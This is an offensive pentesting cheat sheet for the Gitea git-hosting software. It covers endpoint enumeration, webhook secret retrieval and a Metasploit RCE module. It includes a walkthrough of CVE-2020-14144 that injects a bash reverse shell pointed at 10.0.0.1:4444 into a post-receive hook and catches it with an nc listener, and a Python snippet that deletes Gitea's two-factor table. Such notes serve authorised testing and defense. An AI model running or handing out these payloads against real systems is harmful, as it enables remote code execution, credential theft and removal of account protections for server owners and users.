Gitea Pentesting
Last modified: 2023-03-18
Gitea is a forge software package for hosting software development version control using Git.
Common Directories
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Get Secrets in Web Hooks
In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.
Git Fetch Remote Code Execution (RCE)
Metasploit
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run
Git Hooks Remote Code Execution (RCE)
It is CVE-2020-14144 .
1. Login
Access to the Gitea dashboard and login as the existing account.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, inject the payload as below:
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444
5. Start Listener in Terminal
To receive the outcoming connection of the git hook, start listener.
nc -lvnp 4444
6. Create the New Repository in Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After pushing, git hook triggered and execute the reverse shell command.
Now we should get a shell.
Swagger API
We can access to /api/swagger
to interact with Swagger API.
Get New Token & Authorize
We need a token to use Swagger API.
- Register a new account in Gitea top page.
- Go to
/user/settings/applications
and generate a new token. - Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to
/api/swagger
. - Click “Authorize” button. The modal window opens.
- Paste the token in the “Token” section.
Delete the Two-Factor
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()